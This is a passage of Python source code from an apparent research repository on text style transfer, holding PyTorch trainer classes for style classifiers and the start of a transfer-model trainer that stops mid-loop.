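args = parser.parse_args(["--num_labels", "2", "--hidden_size", "128"])
assert args.num_labels == 2 and args.hidden_size == 128
```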
#### File: non-parallel-text-style-transfer-using-self-attn-discriminator/classifier/trainers.py
```python
import os
import time
import csv
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data.dataloader import DataLoader
from torch.nn.utils import clip_grad_norm_ as clip_grad_norm
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from utils import tokenization, optimization, constants, misc
from utils.data import *
def get_classification_data(data_dir, data_name):
"""
args:
data_dir: str
data_name: str
return:
data: dict of {"src_str": list of str, "lab": list of int}
"""
src_0, src_1 = [], []
with open(os.path.join(data_dir, data_name+".0"), 'r') as f:
for line in f.readlines():
src_0.append(line.strip())
with open(os.path.join(data_dir, data_name+".1"), 'r') as f:
for line in f.readlines():
src_1.append(line.strip())
lab_0 = [0] * len(src_0)
lab_1 = [1] * len(src_1)
src = src_0 + src_1
lab = lab_0 + lab_1
data = {"src_str": src, "lab": lab}
print("%s data has been loaded" % data_name)
for l, count in enumerate(np.bincount(data["lab"])):
print("number of label %d: %d" % (l, count))
return data
def load_and_cache_data(args, data_name, tokenizer):
"""
return:
data: dict of {"src_str": list of str,
"src_ind": list of int,
"lab": list of int}
"""
sos_str = "_sos" if args.use_sos else ""
eos_str = "_eos" if args.use_eos else ""
mask_str = "_mask" if "mask" in args.vocab_file_name else ""
cached_data_file = os.path.join(
args.data_dir,
f"cached_cls_{data_name}{sos_str}{eos_str}{mask_str}"
)
if os.path.exists(cached_data_file) and not args.overwrite_cache:
print("Loading data from cached data file %s" % cached_data_file)
data = torch.load(cached_data_file)
else:
print("Creating cached data file from data at %s" % cached_data_file)
data = get_classification_data(args.data_dir, data_name)
index_src = []
str_src = []
sos_id, eos_id = tokenizer.SOS_ID, tokenizer.EOS_ID
sos_token, eos_token = tokenizer.SOS_TOKEN, tokenizer.EOS_TOKEN
if args.use_sos and args.use_eos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([sos_token, text, eos_token]))
elif args.use_sos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text))
str_src.append(' '.join([sos_token, text]))
elif args.use_eos:
for text in data['src_str']:
index_src.append(tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([text, eos_token]))
else:
for text in data['src_str']:
index_src.append(tokenizer.encode(text))
str_src.append(text)
data['src_ind'] = index_src
data['src_str'] = str_src
torch.save(data, cached_data_file)
return data
class BasicTrainer:
"""
Basic Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None):
self.args = args
self.model = model
self.optimizer = None
self.scheduler = None
self.train_dataloader = self.get_dataloader(train_data)\
if train_data else None
self.dev_dataloader = self.get_dataloader(dev_data)\
if dev_data else None
self.test_dataloader = self.get_dataloader(test_data)\
if test_data else None
if self.train_dataloader:
self.optimizer, self.scheduler = self.get_optimizer()
def get_dataloader(self, data):
args = self.args
if args.mode == "train":
shuffle = args.shuffle
else:
shuffle = False
dataset = ClassifierDataset(data["src_ind"], data["lab"])
dataloader = DataLoader(dataset=dataset,
batch_size=args.batch_size,
shuffle=shuffle,
num_workers=args.num_workers,
collate_fn=ClassifierPaddingCollate)
return dataloader
def get_optimizer(self, params=None):
args = self.args
if params is None:
params = self.model.parameters()
train_dataloader = self.train_dataloader
optimizer = optimization.get_optim(args, params)
num_steps = len(train_dataloader) * args.num_train_epochs
print("Total number of steps: %d" % num_steps)
decay_step = len(train_dataloader) * args.decay_epoch
if args.decay_epoch > 0:
print("Step when lr starts to decay: %d" % decay_step)
scheduler = optimization.get_constant_schedule_with_linear_decay(
optimizer, decay_step=decay_step, num_training_steps=num_steps
)
else:
scheduler = optimization.get_constant_schedule(optimizer)
return optimizer, scheduler
def save_checkpoint(self, path):
# torch.save(self.args, os.path.join(path, "args.pt"))
torch.save(self.model.state_dict(), os.path.join(path, "model_state_dict.pt"))
# torch.save(self.optimizer.state_dict(), os.path.join(path, "optimizer_state_dict.pt"))
# torch.save(self.scheduler.state_dict(), os.path.join(path, "scheduler_state_dict.pt"))
def train(self, train_dataloader=None):
print("\n### TRAINING BEGINS ###")
args = self.args
model = self.model
optimizer = self.optimizer
scheduler = self.scheduler
train_dataloader = train_dataloader if train_dataloader else self.train_dataloader
model.train()
loss_record = [] # loss at global_step 0, 1, 2 ...
acc_record = []
global_step_record_for_eval = []
global_step = -1
model.zero_grad()
start_time = time.time()
for ep in range(args.num_train_epochs):
for step, batch in enumerate(train_dataloader):
global_step += 1
src, lab, src_len = batch
src, lab = src.to(args.device), lab.to(args.device)
try:
outputs = model(src)
loss = F.cross_entropy(outputs, lab, reduction='mean')
loss.backward()
g = clip_grad_norm(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
model.zero_grad()
loss_record.append(loss.item())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
if global_step > 0 and global_step % args.log_interval == 0:
print(
f"epoch: {ep} "\
f"step: {global_step} "\
f"loss: {loss.item():.4f} "\
f"||g||: {g:.2f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
if global_step > 0 and global_step % args.eval_interval == 0:
print("\neval model at step: %d" % global_step)
acc = self.evaluate()
acc_record.append(acc)
global_step_record_for_eval.append(global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
model.train()
print("### TRAINING ENDS ###\n")
print("eval model at step: %d" % global_step)
acc = self.evaluate()
acc_record.append(acc)
global_step_record_for_eval.append(global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
train_record = loss_record
eval_record = (acc_record, global_step_record_for_eval)
best_acc = self.save_train_result(train_record, eval_record)
return best_acc, train_record, eval_record
def evaluate(self, eval_dataloader=None):
eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader
args = self.args
model = self.model
model.eval()
total_loss = 0
total_preds, total_labs = [], []
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(eval_dataloader):
src, lab, src_len = batch
total_labs.extend(lab.numpy().tolist())
src, lab = src.to(args.device), lab.to(args.device)
try:
outputs = model(src)
total_loss += F.cross_entropy(outputs, lab, reduction='sum').item()
total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
acc = accuracy_score(total_labs, total_preds)
print("==============================")
print(
"acc: {:.4f} loss: {:.4f} time: {}".format(
acc, total_loss/len(total_labs), misc.timeBetween(start_time, time.time())
)
)
print("==============================\n")
return acc
def test(self, test_dataloader=None, save_res=None):
test_dataloader = test_dataloader if test_dataloader else self.test_dataloader
return self.evaluate(test_dataloader)
def save_train_result(self, train_record, dev_record):
args = self.args
loss_record = train_record
acc_record, gs_record = dev_record
best_acc = np.max(acc_record)
step_of_best_acc = gs_record[np.argmax(acc_record)]
print("best acc: %.4f in step %d" % (best_acc, step_of_best_acc))
with open(os.path.join(args.output_dir, "training_result.log"), 'w') as f:
f.write("best acc: %.4f at step %d\n" % (best_acc, step_of_best_acc))
plt.figure()
plt.xlabel("step")
plt.ylabel("acc")
plt.plot(gs_record, acc_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "acc.pdf"), format='pdf') # bbox_inches='tight'
plt.figure()
plt.xlabel("step")
plt.ylabel("loss")
plt.plot(list(range(len(loss_record))), loss_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
return best_acc
class CNNClassifierTrainer(BasicTrainer):
"""
CNN Classifier Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None, **kwargs):
super(CNNClassifierTrainer, self).__init__(
args, model, train_data, dev_data, test_data
)
class SelfAttnRNNClassifierTrainer(BasicTrainer):
"""
Self-Attention RNN Classifier Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None, **kwargs):
super(SelfAttnRNNClassifierTrainer, self).__init__(
args, model, train_data, dev_data, test_data
)
self.tokenizer = kwargs["tokenizer"]
self.train_data = train_data
self.dev_data = dev_data
self.test_data = test_data
if "mask" in args.vocab_file_name:
self.args.mask_id = self.tokenizer.token2index["[mask]"]
self.model.set_mask_id(self.args.mask_id)
def train(self, train_dataloader=None):
print("\n### TRAINING BEGINS ###")
args = self.args
model = self.model
optimizer = self.optimizer
scheduler = self.scheduler
train_dataloader = train_dataloader if train_dataloader else self.train_dataloader
model.train()
loss_record = [] # loss at global_step 0, 1, 2 ...
acc_record = []
global_step_record_for_eval = []
global_step = -1
pad_id = args.pad_id
model.zero_grad()
if args.freeze_emb_at_beginning:
model.freeze_emb()
start_time = time.time()
for ep in range(args.num_train_epochs):
if ep == args.unfreeze_at_ep and args.freeze_emb_at_beginning:
model.unfreeze_emb()
for step, batch in enumerate(train_dataloader):
global_step += 1
src, lab, src_len = batch
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src, sorted_src_len = sorted_src.to(args.device), sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
try:
sorted_pad_mask = sorted_src == pad_id
sorted_outputs, _ = model(sorted_src, sorted_src_len, sorted_pad_mask)
loss = F.cross_entropy(sorted_outputs, sorted_lab, reduction='mean')
loss.backward()
g = clip_grad_norm(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
model.zero_grad()
loss_record.append(loss.item())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
if global_step > 0 and global_step % args.log_interval == 0:
print(
f"epoch: {ep} "\
f"step: {global_step} "\
f"loss: {loss.item():.4f} "\
f"||g||: {g:.2f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
if global_step > 0 and global_step % args.eval_interval == 0:
print("\neval model at step: %d" % global_step)
acc = self.evaluate()
acc_record.append(acc)
global_step_record_for_eval.append(global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
model.train()
print("### TRAINING ENDS ###\n")
print("eval model at step: %d" % global_step)
acc = self.evaluate()
acc_record.append(acc)
global_step_record_for_eval.append(global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
train_record = loss_record
eval_record = (acc_record, global_step_record_for_eval)
best_acc = self.save_train_result(train_record, eval_record)
return best_acc, train_record, eval_record
def evaluate(self, eval_dataloader=None):
eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader
args = self.args
model = self.model
model.eval()
total_loss = 0
total_preds, total_labs = [], []
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(eval_dataloader):
src, lab, src_len = batch
total_labs.extend(lab.numpy().tolist())
# src, lab = src.to(args.device), lab.to(args.device)
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src, sorted_src_len = sorted_src.to(args.device), sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_pad_mask = sorted_src == pad_id
sorted_outputs, _ = model(sorted_src, sorted_src_len, sorted_pad_mask)
total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item()
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
acc = accuracy_score(total_labs, total_preds)
print("==============================")
print(
"acc: {:.4f} loss: {:.4f} time: {}".format(
acc, total_loss/len(total_labs), misc.timeBetween(start_time, time.time())
)
)
print("==============================\n")
return acc
def test(self, test_dataloader=None, test_data=None, save_res=True):
if test_dataloader is not None:
assert test_data is not None
else:
test_dataloader = self.test_dataloader
test_data = self.test_data
test_lab = test_data['lab']
test_src_str = test_data['src_str']
args = self.args
model = self.model
model.eval()
total_loss = 0
total_preds = []
# total_labs = []
total_weights = []
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(test_dataloader):
src, lab, src_len = batch
# total_labs.extend(lab.numpy().tolist())
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src, sorted_src_len = sorted_src.to(args.device), sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_pad_mask = sorted_src == pad_id
sorted_outputs, sorted_weights = model(sorted_src, sorted_src_len, sorted_pad_mask)
total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item()
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
weights = torch.index_select(sorted_weights, dim=0, index=resorted_indices)
total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist())
total_weights.extend(weights.cpu().numpy().tolist())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
acc = accuracy_score(test_lab, total_preds)
print("==============================")
print(
"acc: {:.4f} loss: {:.4f} time: {}".format(
acc, total_loss/len(test_lab), misc.timeBetween(start_time, time.time())
)
)
print("==============================\n")
# print("type(test_src_str) is", type(test_src_str)) # <class 'list'>
# print("type(test_src_str[0]) is", type(test_src_str[0])) # <class 'str'>
# print("type(test_lab) is", type(test_lab)) # <class 'list'>
# print("type(test_lab[0]) is", type(test_lab[0])) # <class 'int'>
if save_res:
with open(os.path.join(args.output_dir, "weights.csv"), 'w', newline='') as f:
csv_writer = csv.writer(f)
for ind, sample in enumerate(zip(
test_lab, total_preds, test_src_str, total_weights
)):
lab, pred, src_str, weights = sample
# src_str is a list
csv_writer.writerow([f"#{ind}"] + src_str.strip().split())
csv_writer.writerow([f"lab: {lab} (pred: {pred})"] + [f"{w:.2f}" for w in weights])
return acc
def gen_masked_src(self, data_name):
if data_name == "train":
dataloader = self.train_dataloader
data = self.train_data
elif data_name == "dev":
dataloader = self.dev_dataloader
data = self.dev_data
elif data_name == "test":
dataloader = self.test_dataloader
data = self.test_data
test_lab = data['lab']
test_src_str = data['src_str']
args = self.args
model = self.model
tokenizer = self.tokenizer
model.eval()
total_loss = 0
total_preds = []
# total_labs = []
total_weights = []
total_style_src = []
total_content_src = []
pad_id = args.pad_id
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(dataloader):
src, lab, src_len = batch
# total_labs.extend(lab.numpy().tolist())
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
_, resorted_indices = torch.sort(indices, dim=0)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src, sorted_src_len = sorted_src.to(args.device), sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
resorted_indices = resorted_indices.to(args.device)
try:
sorted_pad_mask = sorted_src == pad_id
sorted_outputs, sorted_weights, sorted_style_src,\
sorted_content_src = model.get_masked_src(sorted_src,
sorted_src_len, sorted_pad_mask)
total_loss += F.cross_entropy(sorted_outputs, sorted_lab, reduction='sum').item()
outputs = torch.index_select(sorted_outputs, dim=0, index=resorted_indices)
weights = torch.index_select(sorted_weights, dim=0, index=resorted_indices)
style_src = torch.index_select(sorted_style_src, dim=0, index=resorted_indices)
content_src = torch.index_select(sorted_content_src, dim=0, index=resorted_indices)
total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist())
total_weights.extend(weights.cpu().numpy().tolist())
total_style_src.extend(style_src.cpu().numpy().tolist())
total_content_src.extend(content_src.cpu().numpy().tolist())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
acc = accuracy_score(test_lab, total_preds)
print("==============================")
print(
"acc: {:.4f} loss: {:.4f} time: {}".format(
acc, total_loss/len(test_lab), misc.timeBetween(start_time, time.time())
)
)
print("==============================\n")
# print("type(test_src_str) is", type(test_src_str)) # <class 'list'>
# print("type(test_src_str[0]) is", type(test_src_str[0])) # <class 'str'>
# print("type(test_lab) is", type(test_lab)) # <class 'list'>
# print("type(test_lab[0]) is", type(test_lab[0])) # <class 'int'>
total_src_tokens = []
total_style_tokens = []
total_content_tokens = []
with open(os.path.join(args.output_dir, f"{data_name}_weights.csv"), 'w', newline='') as f:
csv_writer = csv.writer(f)
for ind, sample in enumerate(zip(
test_lab, total_preds, test_src_str, total_weights,
total_style_src, total_content_src
)):
lab, pred, src_str, weights, style_src, content_src = sample
# src_str is a list
src_tokens = src_str.strip().split()
csv_writer.writerow([f"#{ind}"] + list(map(lambda x:"'"+x, src_tokens)))
csv_writer.writerow([f"lab: {lab} (pred: {pred})"] + [f"{w:.2f}" for w in weights])
content_tokens = tokenizer.index_to_token(content_src, include_sos_eos=False)
style_tokens = tokenizer.index_to_token(style_src, include_sos_eos=False)
total_src_tokens.append(src_tokens[1:-1])
total_style_tokens.append(style_tokens)
total_content_tokens.append(content_tokens)
return total_src_tokens, total_content_tokens, total_style_tokens
```
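The `evaluate()`/`test()` methods above sort each batch by sequence length before feeding the RNN and then restore the original order with a second `torch.sort` over the permutation indices. A self-contained sketch of that sort/restore pattern (plain PyTorch, no project code assumed):

```python
import torch

src_len = torch.tensor([3, 7, 5])
batch = torch.tensor([[10], [20], [30]])  # stands in for per-example model outputs

# Sort by length (descending), as required for length-sorted RNN inputs.
sorted_len, indices = torch.sort(src_len, dim=0, descending=True)
# Argsort of the permutation gives the indices that undo it.
_, resorted_indices = torch.sort(indices, dim=0)

sorted_batch = torch.index_select(batch, dim=0, index=indices)
restored = torch.index_select(sorted_batch, dim=0, index=resorted_indices)
assert torch.equal(restored, batch)  # original batch order is recovered
```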
#### File: non-parallel-text-style-transfer-using-self-attn-discriminator/transfer/trainers.py
```python
import os
import time
import csv
import pickle
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data.dataloader import DataLoader
from torch.nn.utils import clip_grad_norm_ as clip_grad_norm
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from utils import tokenization, optimization, constants, misc
from utils.data import *
from utils.evaluator import BLEUEvaluator
def get_transfer_data(data_dir, data_name):
"""
args:
data_dir: str
data_name: str
return:
data: dict of {"src_str": list of str, "lab": list of int}
"""
src_0, src_1 = [], []
with open(os.path.join(data_dir, data_name+".0"), 'r') as f:
for line in f.readlines():
src_0.append(line.strip())
with open(os.path.join(data_dir, data_name+".1"), 'r') as f:
for line in f.readlines():
src_1.append(line.strip())
lab_0 = [0] * len(src_0)
lab_1 = [1] * len(src_1)
src = src_0 + src_1
lab = lab_0 + lab_1
assert len(src) == len(lab)
data = {"src_str": src, "lab": lab}
print("%s data has been loaded" % data_name)
for l, count in enumerate(np.bincount(data["lab"])):
print("number of label %d: %d" % (l, count))
return data
def load_and_cache_data(args, data_name, tokenizer):
"""
return:
data: dict of {"src_str": list of str,
"src_ind": list of int,
"lab": list of int}
"""
sos_str = "_sos" if args.use_sos else ""
eos_str = "_eos" if args.use_eos else ""
mask_str = "_mask" if "mask" in args.vocab_file_name else ""
cached_data_file = os.path.join(
args.data_dir,
f"cached_transfer_{data_name}{sos_str}{eos_str}{mask_str}"
)
if os.path.exists(cached_data_file) and not args.overwrite_cache:
print("Loading data from cached data file %s" % cached_data_file)
data = torch.load(cached_data_file)
else:
print("Creating cached data file from data at %s" % cached_data_file)
data = get_transfer_data(args.data_dir, data_name)
index_src = []
str_src = []
sos_id, eos_id = tokenizer.SOS_ID, tokenizer.EOS_ID
sos_token, eos_token = tokenizer.SOS_TOKEN, tokenizer.EOS_TOKEN
if args.use_sos and args.use_eos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([sos_token, text, eos_token]))
elif args.use_sos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text))
str_src.append(' '.join([sos_token, text]))
elif args.use_eos:
for text in data['src_str']:
index_src.append(tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([text, eos_token]))
else:
for text in data['src_str']:
index_src.append(tokenizer.encode(text))
str_src.append(text)
data['src_ind'] = index_src
data['src_str'] = str_src
torch.save(data, cached_data_file)
return data
def lambda_schedule(num_iter, start=0.0, stop=1.0, ratio=0.1):
lambdas = np.ones(num_iter) * stop
progress_interval = num_iter * ratio
for i in range(int(progress_interval)):
lambdas[i] *= i / progress_interval
return lambdas
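# Note: the `start` argument is currently unused; the schedule ramps linearly
# from 0 to `stop` over the first `ratio` fraction of iterations and then stays
# at `stop`, e.g. lambda_schedule(10, stop=1.0, ratio=0.5)
# -> [0.0, 0.2, 0.4, 0.6, 0.8, 1.0, 1.0, 1.0, 1.0, 1.0]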
class BasicTrainer:
"""
Basic Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None,
tokenizer=None):
self.args = args
self.model = model
self.optimizer = None
self.scheduler = None
self.train_dataloader = self.get_dataloader(train_data, "train")\
if train_data else None
self.dev_dataloader = self.get_dataloader(dev_data, "dev")\
if dev_data else None
self.test_dataloader = self.get_dataloader(test_data, "test")\
if test_data else None
if self.train_dataloader:
self.optimizer, self.scheduler = self.get_optimizer()
def get_dataloader(self, data, data_name):
args = self.args
if data_name == "train":
shuffle = args.shuffle
batch_size = args.batch_size
else:
shuffle = False
# batch_size = 2
batch_size = args.batch_size
dataset = ClassifierDataset(data["src_ind"], data["lab"])
dataloader = DataLoader(dataset=dataset,
batch_size=args.batch_size,
shuffle=shuffle,
num_workers=args.num_workers,
collate_fn=ClassifierPaddingCollate)
return dataloader
def get_optimizer(self):
args = self.args
model = self.model
train_dataloader = self.train_dataloader
optimizer = optimization.get_optim(args, model.parameters())
num_steps = len(train_dataloader) * args.num_train_epochs
args.num_steps = num_steps
print("Total number of steps: %d" % num_steps)
decay_step = len(train_dataloader) * args.decay_epoch
if args.decay_epoch > 0:
print("Step when lr starts to decay: %d" % decay_step)
scheduler = optimization.get_constant_schedule_with_linear_decay(
optimizer, decay_step=decay_step, num_training_steps=num_steps
)
else:
scheduler = optimization.get_constant_schedule(optimizer)
return optimizer, scheduler
def save_checkpoint(self, path):
# torch.save(self.args, os.path.join(path, "args.pt"))
torch.save(self.model.state_dict(), os.path.join(path, "model_state_dict.pt"))
# torch.save(self.optimizer.state_dict(), os.path.join(path, "optimizer_state_dict.pt"))
# torch.save(self.scheduler.state_dict(), os.path.join(path, "scheduler_state_dict.pt"))
return
def train(self):
raise NotImplementedError()
def evaluate(self):
raise NotImplementedError()
def test(self):
raise NotImplementedError()
def save_train_result(self, train_record, eval_record):
args = self.args
train_loss_record = train_record
eval_bleu_record, eval_gs_record = eval_record
best_bleu = np.max(eval_bleu_record)
step_of_best_bleu = eval_gs_record[np.argmax(eval_bleu_record)]
print("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu))
with open(os.path.join(args.output_dir, "training_result.log"), 'w') as f:
f.write("best BLEU: %.4f in step %d" % (best_bleu, step_of_best_bleu))
plt.figure()
plt.xlabel("step")
plt.ylabel("BLEU")
plt.plot(eval_gs_record, eval_bleu_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "bleu.pdf"), format='pdf') # bbox_inches='tight'
plt.figure()
plt.xlabel("step")
plt.ylabel("loss")
plt.plot(list(range(len(train_loss_record))), train_loss_record)
# plt.plot(eval_gs_record, eval_loss_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
return best_bleu, step_of_best_bleu
class TransferModelTrainer(BasicTrainer):
def __init__(self, args, model, train_data=None, dev_data=None,
test_data=None, **kwargs):
super().__init__(
args, model, train_data, dev_data, test_data
)
self.tokenizer = kwargs["tokenizer"]
if self.args.cls_model_path:
print(f"Load classifier model form {self.args.cls_model_path}")
self.model.classifier.load_state_dict(
torch.load(
os.path.join(self.args.cls_model_path, "model_state_dict.pt")
)
)
self.model.freeze_cls()
# args.cls_weight = 0.05
# args.ca_weight = 0.0
# args.bt_weight = 1.0
self.use_caw_schedule = False
del self.optimizer
del self.scheduler
if self.train_dataloader:
params = []
for k, v in self.model.named_parameters():
# print("%s: %s" % (k, str(v.shape)))
if "classifier" in k or "lm" in k:
print("not optimize %s" % k)
else:
print("add params of %s to optimizer" % k)
params.append(v)
self.optimizer, self.scheduler\
= self.get_optimizer(params)
# torch.autograd.set_detect_anomaly(True)
self.clf_model = torch.load(args.cnn_clf_path).to(args.device)
self.clf_model.eval()
self.dev_ref_path_list = getattr(args, "dev_ref_path_list", None)
self.test_ref_path_list = getattr(args, "test_ref_path_list", None)
if self.test_ref_path_list is None:
self.test_ref_path_list = self.args.ref_list
print("self.dev_ref_path_list is")
print(self.dev_ref_path_list)
print("self.test_ref_path_list is")
print(self.test_ref_path_list)
if not self.args.use_bpe:
self.dev_data_path_list = [
[os.path.join(self.args.data_dir, f"dev.{i}")] for i in range(2)
]
self.test_data_path_list = [
[os.path.join(self.args.data_dir, f"test.{i}")] for i in range(2)
]
else:
self.dev_data_path_list = [
[os.path.join(self.args.data_dir, f"self_ref.dev.{i}")] for i in range(2)
]
self.test_data_path_list = [
[os.path.join(self.args.data_dir, f"self_ref.test.{i}")] for i in range(2)
]
print("self.dev_data_path_list is")
print(self.dev_data_path_list)
print("self.test_data_path_list is")
print(self.test_data_path_list)
def get_optimizer(self, params=None):
args = self.args
if params is None:
print("return because params is None")
return None, None
# params = self.model.parameters()
train_dataloader = self.train_dataloader
optimizer = optimization.get_optim(args, params)
num_steps = len(train_dataloader) * args.num_train_epochs // args.grad_accum_interval
args.num_steps = num_steps
print("Total number of steps: %d" % num_steps)
decay_step = len(train_dataloader) * args.decay_epoch
if args.decay_epoch > 0:
print("Step when lr starts to decay: %d" % decay_step)
scheduler = optimization.get_constant_schedule_with_linear_decay(
optimizer, decay_step=decay_step, num_training_steps=num_steps
)
else:
scheduler = optimization.get_constant_schedule(optimizer)
return optimizer, scheduler
def train(self, train_dataloader=None):
print("\n### TRAINING BEGINS ###")
args = self.args
model = self.model
optimizer = self.optimizer
scheduler = self.scheduler
train_dataloader = train_dataloader if train_dataloader else self.train_dataloader
model.train()
loss_record = [] # loss at global_step 0, 1, 2 ...
dev_metric_record = []
global_step_record_for_eval = []
global_step = 0
pad_id = args.pad_id
grad_accum_interval = args.grad_accum_interval
log_loss = 0.0
num_iters_per_epoch = len(train_dataloader)
normalizer = min(num_iters_per_epoch, grad_accum_interval)
cls_w = args.cls_weight
print("cls_w is", cls_w)
if self.use_caw_schedule:
start = 0.0
stop = args.ca_weight
ratio = 0.5
ca_w_list = lambda_schedule(args.num_steps,
start=start, stop=stop, ratio=ratio)
print(f"ca_w uses schedule (start={start}, stop={stop}, ratio={ratio})")
ca_w = ca_w_list[0]
else:
ca_w = args.ca_weight
print("ca_w is", ca_w)
bt_w = args.bt_weight
print("bt_w is", bt_w)
model.zero_grad()
if args.freeze_emb_at_beginning:
model.freeze_emb()
start_time = time.time()
for ep in range(args.num_train_epochs):
if ep == args.unfreeze_at_ep and args.freeze_emb_at_beginning:
model.unfreeze_emb()
for step, batch in enumerate(train_dataloader):
src, lab, src_len = batch
# print(f"ep:{ep}, step: {step}, src.shape[1] is", src.shape[1])
sorted_src_len, indices = torch.sort(src_len, dim=0, descending=True)
sorted_src = torch.index_select(src, dim=0, index=indices)
sorted_lab = torch.index_select(lab, dim=0, index=indices)
sorted_src = sorted_src.to(args.device)
sorted_src_len = sorted_src_len.to(args.device)
sorted_lab = sorted_lab.to(args.device)
try:
sorted_src_pad_mask = sorted_src==pad_id
sorted_loss_tuple, sorted_output_tuple,\
sorted_algin = model(sorted_src, sorted_src_len,
sorted_lab, sorted_src_pad_mask)
sorted_rec_loss, sorted_bt_loss,\
sorted_src_cls_loss, sorted_soft_out_cls_loss,\
sorted_out_cls_loss, sorted_ca_loss = sorted_loss_tuple
sorted_output, sorted_output_len = sorted_output_tuple
rec_loss = sorted_rec_loss.mean()
bt_loss = sorted_bt_loss.mean()
src_cls_loss = sorted_src_cls_loss.mean()
